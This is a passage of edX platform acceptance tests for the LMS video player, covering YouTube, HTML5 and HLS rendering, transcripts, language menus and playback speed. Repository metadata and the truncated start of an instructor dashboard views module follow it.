self.assertFalse(self.video.is_button_shown('transcript_button'))
def test_fullscreen_video_alignment_with_transcript_hidden(self):
"""
Scenario: Video is aligned with transcript hidden in fullscreen mode
Given the course has a Video component in "Youtube" mode
When I view the video at fullscreen
Then the video with the transcript hidden is aligned correctly
"""
self.navigate_to_video()
# click video button "fullscreen"
self.video.click_player_button('fullscreen')
# check if video aligned correctly without enabled transcript
self.assertTrue(self.video.is_aligned(False))
def test_download_button_wo_english_transcript(self):
"""
Scenario: Download button works correctly w/o english transcript in YouTube mode
Given the course has a Video component in "Youtube" mode
And I have defined a downloadable non-english transcript for the video
And I have uploaded a non-english transcript file to assets
Then I can download the transcript in "srt" format
"""
data = {'download_track': True, 'transcripts': {'zh': 'chinese_transcripts.srt'}}
self.metadata = self.metadata_for_mode('youtube', additional_data=data)
self.assets.append('chinese_transcripts.srt')
# go to video
self.navigate_to_video()
# check if we can download transcript in "srt" format that has text "好 各位同学"
unicode_text = "好 各位同学".decode('utf-8')
self.assertTrue(self.video.downloaded_transcript_contains_text('srt', unicode_text))
def test_download_button_two_transcript_languages(self):
"""
Scenario: Download button works correctly for multiple transcript languages
Given the course has a Video component in "Youtube" mode
And I have defined a downloadable non-english transcript for the video
And I have defined english subtitles for the video
Then I see the correct english text in the captions
And the english transcript downloads correctly
And I see the correct non-english text in the captions
And the non-english transcript downloads correctly
"""
self.assets.extend(['chinese_transcripts.srt', 'subs_3_yD_cEKoCk.srt.sjson'])
data = {'download_track': True, 'transcripts': {'zh': 'chinese_transcripts.srt'}, 'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('youtube', additional_data=data)
# go to video
self.navigate_to_video()
# check if "Welcome to edX." text in the captions
self.assertIn('Welcome to edX.', self.video.captions_text)
# check if we can download transcript in "srt" format that has text "Welcome to edX."
self.assertTrue(self.video.downloaded_transcript_contains_text('srt', 'Welcome to edX.'))
# select language with code "zh"
self.assertTrue(self.video.select_language('zh'))
# check if we see "好 各位同学" text in the captions
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
# check if we can download transcript in "srt" format that has text "好 各位同学"
unicode_text = "好 各位同学".decode('utf-8')
self.assertTrue(self.video.downloaded_transcript_contains_text('srt', unicode_text))
def test_fullscreen_video_alignment_on_transcript_toggle(self):
"""
Scenario: Video is aligned correctly on transcript toggle in fullscreen mode
Given the course has a Video component in "Youtube" mode
And I have uploaded a .srt.sjson file to assets
And I have defined subtitles for the video
When I view the video at fullscreen
Then the video with the transcript enabled is aligned correctly
And the video with the transcript hidden is aligned correctly
"""
self.assets.append('subs_3_yD_cEKoCk.srt.sjson')
data = {'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('youtube', additional_data=data)
# go to video
self.navigate_to_video()
# make sure captions are opened
self.video.show_captions()
# click video button "fullscreen"
self.video.click_player_button('fullscreen')
# check if video aligned correctly with enabled transcript
self.assertTrue(self.video.is_aligned(True))
# click video button "transcript"
self.video.click_player_button('transcript_button')
# check if video aligned correctly without enabled transcript
self.assertTrue(self.video.is_aligned(False))
def test_video_rendering_with_default_response_time(self):
"""
Scenario: Video is rendered in Youtube mode when the YouTube Server responds quickly
Given the YouTube server response time less than 1.5 seconds
And the course has a Video component in "Youtube_HTML5" mode
Then the video has rendered in "Youtube" mode
"""
# configure youtube server
self.youtube_configuration['time_to_response'] = 0.4
self.metadata = self.metadata_for_mode('youtube_html5')
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('youtube'))
def test_video_rendering_wo_default_response_time(self):
"""
Scenario: Video is rendered in HTML5 when the YouTube Server responds slowly
Given the YouTube server response time is greater than 1.5 seconds
And the course has a Video component in "Youtube_HTML5" mode
Then the video has rendered in "HTML5" mode
"""
# configure youtube server
self.youtube_configuration['time_to_response'] = 7.0
self.metadata = self.metadata_for_mode('youtube_html5')
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('html5'))
def test_video_with_youtube_blocked_with_default_response_time(self):
"""
Scenario: Video is rendered in HTML5 mode when the YouTube API is blocked
Given the YouTube API is blocked
And the course has a Video component in "Youtube_HTML5" mode
Then the video has rendered in "HTML5" mode
And only one video has rendered
"""
# configure youtube server
self.youtube_configuration.update({
'youtube_api_blocked': True,
})
self.metadata = self.metadata_for_mode('youtube_html5')
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('html5'))
# The video should only be loaded once
self.assertEqual(len(self.video.q(css='video')), 1)
def test_video_with_youtube_blocked_delayed_response_time(self):
"""
Scenario: Video is rendered in HTML5 mode when the YouTube API is blocked
Given the YouTube server response time is greater than 1.5 seconds
And the YouTube API is blocked
And the course has a Video component in "Youtube_HTML5" mode
Then the video has rendered in "HTML5" mode
And only one video has rendered
"""
# configure youtube server
self.youtube_configuration.update({
'time_to_response': 2.0,
'youtube_api_blocked': True,
})
self.metadata = self.metadata_for_mode('youtube_html5')
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('html5'))
# The video should only be loaded once
self.assertEqual(len(self.video.q(css='video')), 1)
def test_html5_video_rendered_with_youtube_captions(self):
"""
Scenario: User should see Youtube captions if there are no transcripts
available for HTML5 mode
Given that I have uploaded a .srt.sjson file to assets for Youtube mode
And the YouTube API is blocked
And the course has a Video component in "Youtube_HTML5" mode
And Video component rendered in HTML5 mode
And Html5 mode video has no transcripts
When I see the captions for HTML5 mode video
Then I should see the Youtube captions
"""
self.assets.append('subs_3_yD_cEKoCk.srt.sjson')
# configure youtube server
self.youtube_configuration.update({
'time_to_response': 2.0,
'youtube_api_blocked': True,
})
data = {'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('youtube_html5', additional_data=data)
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('html5'))
# check if caption button is visible
self.assertTrue(self.video.is_button_shown('transcript_button'))
self._verify_caption_text('Welcome to edX.')
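# ddt parameterization: the test below runs once per (file_type, search_text) pair supplied by @data/@unpack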
@data(('srt', '00:00:00,260'), ('txt', 'Welcome to edX.'))
@unpack
def test_download_transcript_links_work_correctly(self, file_type, search_text):
"""
Scenario: Download 'srt' transcript link works correctly.
Download 'txt' transcript link works correctly.
Given the course has Video components A and B in "Youtube" mode
And Video component C in "HTML5" mode
And I have defined downloadable transcripts for the videos
Then I can download a transcript for Video A in "srt" format
And the Download Transcript menu does not exist for Video C
"""
data_a = {'sub': '3_yD_cEKoCk', 'download_track': True}
youtube_a_metadata = self.metadata_for_mode('youtube', additional_data=data_a)
self.assets.append('subs_3_yD_cEKoCk.srt.sjson')
data_b = {'youtube_id_1_0': 'b7xgknqkQk8', 'sub': 'b7xgknqkQk8', 'download_track': True}
youtube_b_metadata = self.metadata_for_mode('youtube', additional_data=data_b)
self.assets.append('subs_b7xgknqkQk8.srt.sjson')
data_c = {'track': 'http://example.org/', 'download_track': True}
html5_c_metadata = self.metadata_for_mode('html5', additional_data=data_c)
self.contents_of_verticals = [
[{'display_name': 'A', 'metadata': youtube_a_metadata}],
[{'display_name': 'B', 'metadata': youtube_b_metadata}],
[{'display_name': 'C', 'metadata': html5_c_metadata}]
]
# open the section with videos (open vertical containing video "A")
self.navigate_to_video()
# check if we can download transcript in "srt" format that has text "00:00:00,260"
self.assertTrue(self.video.downloaded_transcript_contains_text(file_type, search_text))
# open vertical containing video "C"
self.courseware_page.nav.go_to_vertical('Test Vertical-2')
# menu "download_transcript" doesn't exist
self.assertFalse(self.video.is_menu_present('download_transcript'))
def _verify_caption_text(self, text):
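"""Wait until the video captions contain the given text."""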
self.video._wait_for(
lambda: (text in self.video.captions_text),
u'Captions contain "{}" text'.format(text),
timeout=5
)
def _verify_closed_caption_text(self, text):
"""
Wait until the closed captions contain the given text.
"""
self.video.wait_for(
lambda: (text in self.video.closed_captions_text),
u'Closed captions contain "{}" text'.format(text),
timeout=5
)
def test_video_language_menu_working(self):
"""
Scenario: Language menu works correctly in Video component
Given the course has a Video component in "Youtube" mode
And I have defined multiple language transcripts for the videos
And I make sure captions are closed
And I see video menu "language" with correct items
And I select language with code "zh"
Then I see "好 各位同学" text in the captions
And I select language with code "en"
Then I see "Welcome to edX." text in the captions
"""
self.assets.extend(['chinese_transcripts.srt', 'subs_3_yD_cEKoCk.srt.sjson'])
data = {'transcripts': {"zh": "chinese_transcripts.srt"}, 'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('youtube', additional_data=data)
# go to video
self.navigate_to_video()
self.video.hide_captions()
correct_languages = {'en': 'English', 'zh': 'Chinese'}
self.assertEqual(self.video.caption_languages, correct_languages)
self.video.select_language('zh')
unicode_text = "好 各位同学".decode('utf-8')
self._verify_caption_text(unicode_text)
self.video.select_language('en')
self._verify_caption_text('Welcome to edX.')
def test_video_language_menu_working_closed_captions(self):
"""
Scenario: Language menu works correctly in Video component, checks closed captions
Given the course has a Video component in "Youtube" mode
And I have defined multiple language transcripts for the videos
And I make sure captions are closed
And I see video menu "language" with correct items
And I select language with code "en"
Then I see "Welcome to edX." text in the closed captions
And I select language with code "zh"
Then I see "我们今天要讲的题目是" text in the closed captions
"""
self.assets.extend(['chinese_transcripts.srt', 'subs_3_yD_cEKoCk.srt.sjson'])
data = {'transcripts': {"zh": "chinese_transcripts.srt"}, 'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('youtube', additional_data=data)
# go to video
self.navigate_to_video()
self.video.show_closed_captions()
correct_languages = {'en': 'English', 'zh': 'Chinese'}
self.assertEqual(self.video.caption_languages, correct_languages)
# we start the video, then pause it to activate the transcript
self.video.click_player_button('play')
self.video.wait_for_position('0:03')
self.video.click_player_button('pause')
self.video.select_language('en')
self.video.click_transcript_line(line_no=1)
self._verify_closed_caption_text('Welcome to edX.')
self.video.select_language('zh')
unicode_text = "我们今天要讲的题目是".decode('utf-8')
self.video.click_transcript_line(line_no=1)
self._verify_closed_caption_text(unicode_text)
def test_video_component_stores_speed_correctly_for_multiple_videos(self):
"""
Scenario: Video component stores speed correctly when each video is in separate sequential
Given I have a video "A" in "Youtube" mode in position "1" of sequential
And a video "B" in "Youtube" mode in position "2" of sequential
And a video "C" in "HTML5" mode in position "3" of sequential
"""
# vertical titles are created in VideoBaseTest._create_single_vertical
# and are of the form Test Vertical-{_} where _ is the index in self.contents_of_verticals
self.contents_of_verticals = [
[{'display_name': 'A'}], [{'display_name': 'B'}],
[{'display_name': 'C', 'metadata': self.metadata_for_mode('html5')}]
]
self.navigate_to_video()
# select the "2.0" speed on video "A"
self.courseware_page.nav.go_to_vertical('Test Vertical-0')
self.video.wait_for_video_player_render()
self.video.speed = '2.0'
# select the "0.50" speed on video "B"
self.courseware_page.nav.go_to_vertical('Test Vertical-1')
self.video.wait_for_video_player_render()
self.video.speed = '0.50'
# open video "C"
self.courseware_page.nav.go_to_vertical('Test Vertical-2')
self.video.wait_for_video_player_render()
# Since the playback speed was set to .5 in "B", this video will also be impacted
# because a playback speed has never explicitly been set for it. However, this video
# does not have a .5 playback option, so the closest possible (.75) should be selected.
self.video.verify_speed_changed('0.75x')
# go to the vertical containing video "A"
self.courseware_page.nav.go_to_vertical('Test Vertical-0')
# Video "A" should still play at speed 2.0 because it was explicitly set to that.
self.assertEqual(self.video.speed, '2.0x')
# reload the page
self.video.reload_page()
# go to the vertical containing video "A"
self.courseware_page.nav.go_to_vertical('Test Vertical-0')
# check if video "A" should start playing at speed "2.0"
self.assertEqual(self.video.speed, '2.0x')
# select the "1.0" speed on video "A"
self.video.speed = '1.0'
# go to the vertical containing "B"
self.courseware_page.nav.go_to_vertical('Test Vertical-1')
# Video "B" should still play at speed .5 because it was explicitly set to that.
self.assertEqual(self.video.speed, '0.50x')
# go to the vertical containing video "C"
self.courseware_page.nav.go_to_vertical('Test Vertical-2')
# The change of speed for Video "A" should impact Video "C" because it still has
# not been explicitly set to a speed.
self.video.verify_speed_changed('1.0x')
def test_video_has_correct_transcript(self):
"""
Scenario: Youtube video has correct transcript if fields for other speeds are filled
Given it has a video in "Youtube" mode
And I have uploaded multiple transcripts
And I make sure captions are opened
Then I see "Welcome to edX." text in the captions
And I select the "1.50" speed
And I reload the page with video
Then I see "Welcome to edX." text in the captions
And I see duration "1:56"
"""
self.assets.extend(['subs_3_yD_cEKoCk.srt.sjson', 'subs_b7xgknqkQk8.srt.sjson'])
data = {'sub': '3_yD_cEKoCk', 'youtube_id_1_5': 'b7xgknqkQk8'}
self.metadata = self.metadata_for_mode('youtube', additional_data=data)
# go to video
self.navigate_to_video()
self.video.show_captions()
self.assertIn('Welcome to edX.', self.video.captions_text)
self.video.speed = '1.50'
self.video.reload_page()
self.assertIn('Welcome to edX.', self.video.captions_text)
self.assertEqual(self.video.duration, '1:56')
def test_video_position_stored_correctly_wo_seek(self):
"""
Scenario: Video component stores position correctly when page is reloaded
Given the course has a Video component in "Youtube" mode
Then the video has rendered in "Youtube" mode
And I click video button "play"
Then I wait until video reaches at position "0.03"
And I click video button "pause"
And I reload the page with video
And I click video button "play"
And I click video button "pause"
Then video slider should be Equal or Greater than "0:03"
"""
self.navigate_to_video()
self.video.click_player_button('play')
self.video.wait_for_position('0:03')
self.video.click_player_button('pause')
self.video.reload_page()
self.video.click_player_button('play')
self.video.click_player_button('pause')
self.assertGreaterEqual(self.video.seconds, 3)
def test_simplified_and_traditional_chinese_transcripts(self):
"""
Scenario: Simplified and Traditional Chinese transcripts work as expected in Youtube mode
Given the course has a Video component in "Youtube" mode
And I have defined a Simplified Chinese transcript for the video
And I have defined a Traditional Chinese transcript for the video
Then I see the correct subtitle language options in cc menu
Then I see the correct text in the captions for Simplified and Traditional Chinese transcripts
And I can download the transcripts for Simplified and Traditional Chinese
And video subtitle menu has 'zh_HANS', 'zh_HANT' translations for 'Simplified Chinese'
and 'Traditional Chinese' respectively
"""
data = {
'download_track': True,
'transcripts': {'zh_HANS': 'simplified_chinese.srt', 'zh_HANT': 'traditional_chinese.srt'}
}
self.metadata = self.metadata_for_mode('youtube', data)
self.assets.extend(['simplified_chinese.srt', 'traditional_chinese.srt'])
self.navigate_to_video()
langs = {'zh_HANS': '在线学习是革', 'zh_HANT': '在線學習是革'}
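# For each Chinese variant, verify the caption text and that the downloaded srt transcript contains it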
for lang_code, text in langs.items():
self.video.scroll_to_button("transcript_button")
self.assertTrue(self.video.select_language(lang_code))
unicode_text = text.decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.assertTrue(self.video.downloaded_transcript_contains_text('srt', unicode_text))
self.assertEqual(self.video.caption_languages, {'zh_HANS': 'Simplified Chinese', 'zh_HANT': 'Traditional Chinese'})
@attr(shard=13)
class YouTubeHtml5VideoTest(VideoBaseTest):
""" Test YouTube HTML5 Video Player """
def test_youtube_video_rendering_with_unsupported_sources(self):
"""
Scenario: Video component is rendered in the LMS in Youtube mode
with HTML5 sources that are not supported by the browser
Given the course has a Video component in "Youtube_HTML5_Unsupported_Video" mode
Then the video has rendered in "Youtube" mode
"""
self.metadata = self.metadata_for_mode('youtube_html5_unsupported_video')
self.navigate_to_video()
# Verify that the video has rendered in "Youtube" mode
self.assertTrue(self.video.is_video_rendered('youtube'))
@attr(shard=19)
class Html5VideoTest(VideoBaseTest):
""" Test HTML5 Video Player """
def test_autoplay_disabled_for_video_component(self):
"""
Scenario: Autoplay is disabled by default for a Video component
Given the course has a Video component in "HTML5" mode
When I view the Video component
Then it does not have autoplay enabled
"""
self.metadata = self.metadata_for_mode('html5')
self.navigate_to_video()
# Verify that the video has autoplay mode disabled
self.assertFalse(self.video.is_autoplay_enabled)
def test_html5_video_rendering_with_unsupported_sources(self):
"""
Scenario: LMS displays an error message for HTML5 sources that are not supported by browser
Given the course has a Video component in "HTML5_Unsupported_Video" mode
When I view the Video component
Then an error message is shown
And the error message has the correct text
"""
self.metadata = self.metadata_for_mode('html5_unsupported_video')
self.navigate_to_video_no_render()
# Verify that error message is shown
self.assertTrue(self.video.is_error_message_shown)
# Verify that error message has correct text
correct_error_message_text = 'No playable video sources found.'
self.assertIn(correct_error_message_text, self.video.error_message_text)
# Verify that spinner is not shown
self.assertFalse(self.video.is_spinner_shown)
def test_download_button_wo_english_transcript(self):
"""
Scenario: Download button works correctly w/o english transcript in HTML5 mode
Given the course has a Video component in "HTML5" mode
And I have defined a downloadable non-english transcript for the video
And I have uploaded a non-english transcript file to assets
Then I see the correct non-english text in the captions
And the non-english transcript downloads correctly
"""
data = {'download_track': True, 'transcripts': {'zh': 'chinese_transcripts.srt'}}
self.metadata = self.metadata_for_mode('html5', additional_data=data)
self.assets.append('chinese_transcripts.srt')
# go to video
self.navigate_to_video()
# check if we see "好 各位同学" text in the captions
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
# check if we can download transcript in "srt" format that has text "好 各位同学"
unicode_text = "好 各位同学".decode('utf-8')
self.assertTrue(self.video.downloaded_transcript_contains_text('srt', unicode_text))
def test_download_button_two_transcript_languages(self):
"""
Scenario: Download button works correctly for multiple transcript languages in HTML5 mode
Given the course has a Video component in "HTML5" mode
And I have defined a downloadable non-english transcript for the video
And I have defined english subtitles for the video
Then I see the correct english text in the captions
And the english transcript downloads correctly
And I see the correct non-english text in the captions
And the non-english transcript downloads correctly
"""
self.assets.extend(['chinese_transcripts.srt', 'subs_3_yD_cEKoCk.srt.sjson'])
data = {'download_track': True, 'transcripts': {'zh': 'chinese_transcripts.srt'}, 'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('html5', additional_data=data)
# go to video
self.navigate_to_video()
# check if "Welcome to edX." text in the captions
self.assertIn('Welcome to edX.', self.video.captions_text)
self.video.wait_for_element_visibility('.transcript-end', 'Transcript has loaded')
# check if we can download transcript in "srt" format that has text "Welcome to edX."
self.assertTrue(self.video.downloaded_transcript_contains_text('srt', 'Welcome to edX.'))
# select language with code "zh"
self.assertTrue(self.video.select_language('zh'))
# check if we see "好 各位同学" text in the captions
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
# Then I can download transcript in "srt" format that has text "好 各位同学"
unicode_text = "好 各位同学".decode('utf-8')
self.assertTrue(self.video.downloaded_transcript_contains_text('srt', unicode_text))
def test_full_screen_video_alignment_with_transcript_visible(self):
"""
Scenario: Video is aligned correctly with transcript enabled in fullscreen mode
Given the course has a Video component in "HTML5" mode
And I have uploaded a .srt.sjson file to assets
And I have defined subtitles for the video
When I show the captions
And I view the video at fullscreen
Then the video with the transcript enabled is aligned correctly
"""
self.assets.append('subs_3_yD_cEKoCk.srt.sjson')
data = {'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('html5', additional_data=data)
# go to video
self.navigate_to_video()
# make sure captions are opened
self.video.show_captions()
# click video button "fullscreen"
self.video.click_player_button('fullscreen')
# check if video aligned correctly with enabled transcript
self.assertTrue(self.video.is_aligned(True))
def test_cc_button_with_english_transcript(self):
"""
Scenario: CC button works correctly with only english transcript in HTML5 mode
Given the course has a Video component in "HTML5" mode
And I have defined english subtitles for the video
And I have uploaded an english transcript file to assets
Then I see the correct text in the captions
"""
self.assets.append('subs_3_yD_cEKoCk.srt.sjson')
data = {'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('html5', additional_data=data)
# go to video
self.navigate_to_video()
# make sure captions are opened
self.video.show_captions()
# check if we see "Welcome to edX." text in the captions
self.assertIn("Welcome to edX.", self.video.captions_text)
def test_cc_button_wo_english_transcript(self):
"""
Scenario: CC button works correctly w/o english transcript in HTML5 mode
Given the course has a Video component in "HTML5" mode
And I have defined a non-english transcript for the video
And I have uploaded a non-english transcript file to assets
Then I see the correct text in the captions
"""
self.assets.append('chinese_transcripts.srt')
data = {'transcripts': {'zh': 'chinese_transcripts.srt'}}
self.metadata = self.metadata_for_mode('html5', additional_data=data)
# go to video
self.navigate_to_video()
# make sure captions are opened
self.video.show_captions()
# check if we see "好 各位同学" text in the captions
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
def test_video_rendering(self):
"""
Scenario: Video component is fully rendered in the LMS in HTML5 mode
Given the course has a Video component in "HTML5" mode
Then the video has rendered in "HTML5" mode
And video sources are correct
"""
self.metadata = self.metadata_for_mode('html5')
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('html5'))
self.assertTrue(all([source in HTML5_SOURCES for source in self.video.sources]))
@attr(shard=13)
class YouTubeQualityTest(VideoBaseTest):
""" Test YouTube Video Quality Button """
@skip_if_browser('firefox')
def test_quality_button_visibility(self):
"""
Scenario: Quality button appears on play.
Given the course has a Video component in "Youtube" mode
Then I see video button "quality" is hidden
And I click video button "play"
Then I see video button "quality" is visible
"""
self.navigate_to_video()
self.assertFalse(self.video.is_quality_button_visible)
self.video.click_player_button('play')
self.video.wait_for(lambda: self.video.is_quality_button_visible, 'waiting for quality button to appear')
@skip_if_browser('firefox')
def test_quality_button_works_correctly(self):
"""
Scenario: Quality button works correctly.
Given the course has a Video component in "Youtube" mode
And I click video button "play"
And I see video button "quality" is inactive
And I click video button "quality"
Then I see video button "quality" is active
"""
self.navigate_to_video()
self.video.click_player_button('play')
self.video.wait_for(lambda: self.video.is_quality_button_visible, 'waiting for quality button to appear')
self.assertFalse(self.video.is_quality_button_active)
self.video.click_player_button('quality')
self.video.wait_for(lambda: self.video.is_quality_button_active, 'waiting for quality button activation')
@attr('a11y')
class LMSVideoModuleA11yTest(VideoBaseTest):
"""
LMS Video Accessibility Test Class
"""
def setUp(self):
browser = os.environ.get('SELENIUM_BROWSER', 'firefox')
# the a11y tests run in CI under phantomjs which doesn't
# support html5 video or flash player, so the video tests
# don't work in it. We still want to be able to run these
# tests in CI, so override the browser setting if it is
# phantomjs.
if browser == 'phantomjs':
browser = 'firefox'
with patch.dict(os.environ, {'SELENIUM_BROWSER': browser}):
super(LMSVideoModuleA11yTest, self).setUp()
def test_video_player_a11y(self):
# load transcripts so we can test skipping to
self.assets.extend(['english_single_transcript.srt', 'subs_3_yD_cEKoCk.srt.sjson'])
data = {'transcripts': {"en": "english_single_transcript.srt"}, 'sub': '3_yD_cEKoCk'}
self.metadata = self.metadata_for_mode('youtube', additional_data=data)
# go to video
self.navigate_to_video()
self.video.show_captions()
# limit the scope of the audit to the video player only.
self.video.a11y_audit.config.set_scope(
include=["div.video"]
)
self.video.a11y_audit.check_for_accessibility_errors()
@attr(shard=11)
class VideoPlayOrderTest(VideoBaseTest):
"""
Test video play order with multiple videos
Priority of video formats is:
* Youtube
* HLS
* HTML5
"""
def setUp(self):
super(VideoPlayOrderTest, self).setUp()
def test_play_youtube_video(self):
"""
Scenario: Correct video is played when we have different video formats.
Given the course has a Video component with Youtube, HTML5 and HLS sources available.
When I view the Video component
Then it should play the Youtube video
"""
additional_data = {'youtube_id_1_0': 'b7xgknqkQk8'}
self.metadata = self.metadata_for_mode('html5_and_hls', additional_data=additional_data)
self.navigate_to_video()
# Verify that the video is youtube
self.assertTrue(self.video.is_video_rendered('youtube'))
def test_play_html5_hls_video(self):
"""
Scenario: HLS video is played when we have HTML5 and HLS video formats only.
Given the course has a Video component with HTML5 and HLS sources available.
When I view the Video component
Then it should play the HLS video
"""
self.metadata = self.metadata_for_mode('html5_and_hls')
self.navigate_to_video()
# Verify that the video is hls
self.assertTrue(self.video.is_video_rendered('hls'))
@attr(shard=11)
class HLSVideoTest(VideoBaseTest):
"""
Tests related to HLS video
"""
def test_video_play_pause(self):
"""
Scenario: Video play and pause is working as expected for hls video
Given the course has a Video component with only HLS source available.
When I view the Video component
Then I can see play and pause are working as expected
"""
self.metadata = self.metadata_for_mode('hls')
self.navigate_to_video()
self.video.click_player_button('play')
self.assertEqual(self.video.state, 'playing')
self.video.click_player_button('pause')
self.assertEqual(self.video.state, 'pause')
def test_video_seek(self):
"""
Scenario: Video seek is working as expected for hls video
Given the course has a Video component with only HLS source available.
When I view the Video component
Then I can seek the video as expected
"""
self.metadata = self.metadata_for_mode('hls')
self.navigate_to_video()
self.video.click_player_button('play')
self.video.wait_for_position('0:02')
self.video.click_player_button('pause')
self.video.seek('0:05')
self.assertEqual(self.video.position, '0:05')
def test_video_download_link(self):
"""
Scenario: Correct video url is selected for download
Given the course has a Video component with Youtube, HTML5 and HLS sources available.
When I view the Video component
Then HTML5 video download url is available
"""
self.metadata = self.metadata_for_mode('html5_and_hls', additional_data={'download_video': True})
self.navigate_to_video()
# Verify that the video download url is correct
self.assertEqual(self.video.video_download_url, HTML5_SOURCES[0])
def test_no_video_download_link_for_hls(self):
"""
Scenario: Video download url is not shown for hls videos
Given the course has a Video component with only HLS sources available.
When I view the Video component
Then there is no video download url shown
"""
additional_data = {'download_video': True}
self.metadata = self.metadata_for_mode('hls', additional_data=additional_data)
self.navigate_to_video()
# Verify that the video download url is not shown
self.assertEqual(self.video.video_download_url, None)
def test_hls_video_with_youtube_blocked(self):
"""
Scenario: HLS video is rendered when the YouTube API is blocked
Given the YouTube API is blocked
And the course has a Video component with Youtube, HTML5 and HLS sources available
Then the HLS video is rendered
"""
# configure youtube server
self.youtube_configuration.update({
'youtube_api_blocked': True,
})
self.metadata = self.metadata_for_mode('html5_and_hls', additional_data={'youtube_id_1_0': 'b7xgknqkQk8'})
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('hls'))
def test_hls_video_with_youtube_delayed_response_time(self):
"""
Scenario: HLS video is rendered when the YouTube API response time is slow
Given the YouTube server response time is greater than 1.5 seconds
And the course has a Video component with Youtube, HTML5 and HLS sources available
Then the HLS video is rendered
"""
# configure youtube server
self.youtube_configuration.update({
'time_to_response': 7.0,
})
self.metadata = self.metadata_for_mode('html5_and_hls', additional_data={'youtube_id_1_0': 'b7xgknqkQk8'})
self.navigate_to_video()
self.assertTrue(self.video.is_video_rendered('hls'))
def test_hls_video_with_transcript(self):
"""
Scenario: Transcript work as expected for an HLS video
Given the course has a Video component with "HLS" video only
And I have defined a transcript for the video
Then I see the correct text in the captions for transcript
Then I click on a caption line
And video position should be updated accordingly
Then I change video position
And video caption should be updated accordingly
"""
data = {'transcripts': {'zh': 'transcript.srt'}}
self.metadata = self.metadata_for_mode('hls', additional_data=data)
self.assets.append('transcript.srt')
self.navigate_to_video()
self.assertIn("Hi, edX welcomes you0.", self.video.captions_text)
for line_no in range(5):
self.video.click_transcript_line(line_no=line_no)
self.video.wait_for_position('0:0{}'.format(line_no))
for line_no in range(5):
self.video.seek('0:0{}'.format(line_no))
self.assertEqual(self.video.active_caption_text, 'Hi, edX welcomes you{}.'.format(line_no))
|
Stanford-Online/edx-platform
|
common/test/acceptance/tests/video/test_video_module.py
|
Python
|
agpl-3.0
| 50,719
|
[
"VisIt"
] |
c1f276f4c6ecd616dc9015002d8beda10a75f45607b27c85375cfa5a92b1755b
|
"""
Instructor Dashboard Views
"""
import datetime
import logging
import uuid
from django.conf import settings
import pytz
from openedx.core.lib.xblock_builtin import get_css_dependencies, get_js_dependencies
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.views.decorators.http import require_POST
from django.utils.translation import ugettext as _, ugettext_noop
from django.core.urlresolvers import reverse
from django.http import Http404, HttpResponseServerError
from django.utils.html import escape
from django.views.decorators.cache import cache_control
from django.views.decorators.csrf import ensure_csrf_cookie
from mock import patch
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from openedx.core.lib.xblock_utils import wrap_xblock
from openedx.core.lib.url_utils import quote_slashes
from xmodule.html_module import HtmlDescriptor
from xmodule.modulestore.django import modulestore
from xmodule.tabs import CourseTab
from xblock.field_data import DictFieldData
from xblock.fields import ScopeIds
from bulk_email.models import BulkEmailFlag
from lms.djangoapps.certificates import api as certs_api
from lms.djangoapps.certificates.models import (
CertificateGenerationConfiguration,
CertificateGenerationHistory,
CertificateInvalidation,
CertificateStatuses,
CertificateWhitelist,
GeneratedCertificate
)
from class_dashboard.dashboard_data import get_array_section_has_problem, get_section_display_name
from course_modes.models import CourseMode, CourseModesArchive
from courseware.access import has_access
from courseware.courses import get_course_by_id, get_studio_url
from django_comment_client.utils import available_division_schemes, has_forum_access
from django_comment_common.models import FORUM_ROLE_ADMINISTRATOR, CourseDiscussionSettings
from edxmako.shortcuts import render_to_response
from lms.djangoapps.courseware.module_render import get_module_by_usage_id
from openedx.core.djangoapps.course_groups.cohorts import DEFAULT_COHORT_NAME, get_course_cohorts, is_course_cohorted
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.verified_track_content.models import VerifiedTrackCohortedCourse
from openedx.core.djangolib.markup import HTML, Text
from shoppingcart.models import Coupon, CourseRegCodeItem, PaidCourseRegistration
from student.models import CourseEnrollment
from student.roles import CourseFinanceAdminRole, CourseSalesAdminRole, CourseStaffRole, CourseInstructorRole
from util.json_request import JsonResponse
from .tools import get_units_with_due_date, title_or_url
log = logging.getLogger(__name__)
class InstructorDashboardTab(CourseTab):
"""
Defines the Instructor Dashboard view type that is shown as a course tab.
"""
type = "instructor"
title = ugettext_noop('Instructor')
view_name = "instructor_dashboard"
is_dynamic = True # The "Instructor" tab is instead dynamically added when it is enabled
@classmethod
def is_enabled(cls, course, user=None):
"""
Returns true if the specified user has staff access.
"""
return bool(user and has_access(user, 'staff', course, course.id))
def show_analytics_dashboard_message(course_key):
"""
Defines whether or not the analytics dashboard URL should be displayed.
Arguments:
course_key (CourseLocator): The course locator to display the analytics dashboard message on.
"""
if hasattr(course_key, 'ccx'):
ccx_analytics_enabled = settings.FEATURES.get('ENABLE_CCX_ANALYTICS_DASHBOARD_URL', False)
return settings.ANALYTICS_DASHBOARD_URL and ccx_analytics_enabled
return settings.ANALYTICS_DASHBOARD_URL
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
def instructor_dashboard_2(request, course_id):
""" Display the instructor dashboard for a course. """
try:
